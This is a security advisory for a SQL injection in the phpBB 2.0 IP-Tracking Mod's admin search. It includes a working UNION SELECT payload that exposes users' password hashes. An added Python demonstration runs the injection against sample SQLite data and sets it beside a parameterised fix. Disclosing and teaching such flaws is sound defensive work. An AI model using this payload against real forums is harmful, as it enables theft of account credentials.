
SQL-Injection in IP-TRACKING Mod for phpBB2.0.x



Information: The IP-Tracking Mod is an extension for phpBB 2.0.x that logs
every page hit made by the board's users, including referer, IP address and
username. It contains a SQL injection that is reachable at admin level (from
the Administration Control Panel). The mod is available from:
http://www.phpbb.de/viewtopic.php?t=63690&postdays=0&postorder=asc&start=0

Steps to reproduce: Go into your ACP, select IP-Search under IP-Tracking,
select "no" at "use wildcards" and enter whatever you want in the Search
Query field. The search string is passed straight into the SQL query without
escaping. As Search Type I used IP.

PoC: enter

    ' UNION SELECT user_password as ip,user_id,username,user_active,user_regdate,user_level,user_posts from phpbb_users#

as the Search Query. The leading quote closes the IP string literal, the
UNION appends one row per account from phpbb_users with the same seven
columns as the original SELECT, and the trailing # comments out the rest of
the statement. The result page will display all the hashed user passwords in
the IP column.
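The following is an added example, not code from the IP-Tracking Mod or from the advisory author. It reproduces the injection against an in-memory SQLite database and sets the vulnerable string-spliced search beside a parameterised one. The log table name (iptrack_hits), its columns and all row data are constructed assumptions; the phpbb_users columns are phpBB 2.0's real ones. Because SQLite does not treat # as a comment, the payload ends the statement with -- instead of the # used in the PoC above.

```python
import sqlite3

# Added example, not the mod's own code. The iptrack_hits table, its columns
# and every row below are constructed for the demonstration.
SEARCH_COLUMNS = ("ip, user_id, username, user_active, "
                  "user_regdate, user_level, user_posts")


def build_db() -> sqlite3.Connection:
    """Build a small in-memory board with constructed sample data."""
    db = sqlite3.connect(":memory:")
    db.executescript(f"""
        CREATE TABLE phpbb_users (
            user_id INTEGER, username TEXT, user_password TEXT,
            user_active INTEGER, user_regdate INTEGER,
            user_level INTEGER, user_posts INTEGER);
        CREATE TABLE iptrack_hits ({SEARCH_COLUMNS}, referer TEXT);
        -- sample hashes: md5('123456') and md5('password')
        INSERT INTO phpbb_users VALUES
            (2, 'admin', 'e10adc3949ba59abbe56e057f20f883e', 1, 1100000000, 1, 42);
        INSERT INTO phpbb_users VALUES
            (3, 'alice', '5f4dcc3b5aa765d61d8327deb882cf99', 1, 1100001000, 0, 7);
        INSERT INTO iptrack_hits VALUES
            ('10.0.0.5', 3, 'alice', 1, 1100001000, 0, 7, 'http://example.invalid/');
    """)
    return db


def vulnerable_ip_search(db: sqlite3.Connection, query: str) -> list:
    """Mirrors the mod with 'use wildcards' = no: the search string is
    spliced directly into the SQL text, so a quote breaks out of the literal."""
    sql = f"SELECT {SEARCH_COLUMNS} FROM iptrack_hits WHERE ip = '{query}'"
    return db.execute(sql).fetchall()


def safe_ip_search(db: sqlite3.Connection, query: str) -> list:
    """Same search with a bound parameter: whatever is typed can only ever be
    compared against the ip column as a value, never parsed as SQL."""
    sql = f"SELECT {SEARCH_COLUMNS} FROM iptrack_hits WHERE ip = ?"
    return db.execute(sql, (query,)).fetchall()


# The original SELECT returns seven columns, so the UNION must supply seven
# as well; user_password is aliased to ip so each hash lands in the column
# the ACP renders as the IP address. "-- " replaces MySQL's "#" for SQLite.
PAYLOAD = ("' UNION SELECT user_password AS ip, user_id, username, user_active, "
           "user_regdate, user_level, user_posts FROM phpbb_users -- ")


def leaked_hashes(db: sqlite3.Connection) -> list:
    """Run the PoC through the vulnerable search and collect the ip column."""
    return [row[0] for row in vulnerable_ip_search(db, PAYLOAD)]


if __name__ == "__main__":
    db = build_db()
    print("normal search:", vulnerable_ip_search(db, "10.0.0.5"))
    for digest in leaked_hashes(db):
        print("leaked via ip column:", digest)
    print("parameterised search with payload:", safe_ip_search(db, PAYLOAD))
```

The fix that matters is the one in safe_ip_search: binding the search string as a parameter (or, in the phpBB 2.0 code base, escaping it before concatenation) removes the injection regardless of which Search Type or wildcard setting is chosen.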
